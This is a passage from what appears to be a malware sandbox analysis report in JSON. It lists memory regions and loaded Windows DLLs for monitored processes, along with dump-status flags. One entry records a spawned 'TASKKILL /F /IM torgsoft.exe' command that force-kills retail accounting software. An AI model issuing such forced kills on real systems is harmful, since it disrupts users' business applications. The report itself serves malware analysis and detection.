"size": 262144, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_4667", "name": "private_0x0000000001dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31195136, "timestamp": "00:01:35.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 36302847, "entry_point": 33357824, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4668", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:01:35.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4669", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:35.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4670", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:35.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4671", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:35.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4672", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:35.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_4673", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:35.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8323072, "type": "region", "version": 1 }, "end_va": 8585215, "entry_point": 0, "filename": null, "id": "region_4674", "name": "private_0x00000000007f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8323072, "timestamp": "00:01:35.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 31981567, "entry_point": 0, "filename": null, "id": "region_4675", "name": "private_0x0000000001e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 31719424, "timestamp": "00:01:35.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37683199, "entry_point": 0, "filename": null, "id": "region_4676", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:01:35.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958342655, "entry_point": 1958289824, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4677", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:01:35.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4678", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:35.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4679", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:35.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1784086528, "type": "region", "version": 1 }, "end_va": 1784700927, "entry_point": 1784215737, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4680", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1784086528, "timestamp": "00:01:35.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958248447, "entry_point": 1958155061, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4681", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:35.199", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM torgsoft.exe /IM torgsoft.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_40", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 40, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4682", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:35.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4683", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:35.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4684", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:35.710", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4685", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:35.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4686", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:35.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_4687", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:35.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_4688", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:35.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 15466496, "type": "region", "version": 1 }, "end_va": 15556607, "entry_point": 15490185, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4689", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 15466496, "timestamp": "00:01:35.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4690", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:35.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4691", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4692", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4693", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4694", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4695", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4696", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4697", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4698", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:35.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_4699", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:01:35.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4700", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:35.719", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4701", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:35.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4702", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:35.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4703", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:35.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4704", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:35.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4705", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:35.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4706", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:35.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4707", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:35.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_4708", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:01:35.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_4709", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:01:35.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4710", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:35.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4711", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:35.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4712", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:35.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4713", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:35.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958998015, "entry_point": 1958941345, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4714", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:35.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959284735, "entry_point": 1959072725, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4715", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:35.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959366655, "entry_point": 1959335334, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4716", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:35.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959395328, "type": "region", "version": 1 }, "end_va": 1959464959, "entry_point": 1959400192, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4717", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959395328, "timestamp": "00:01:35.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959526400, "type": "region", "version": 1 }, "end_va": 1959579647, "entry_point": 1959530976, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4718", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959526400, "timestamp": "00:01:35.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4719", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:35.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4720", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:35.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4721", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:35.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4722", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:35.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4723", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:35.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4724", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:35.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4725", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:35.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4726", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:35.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not 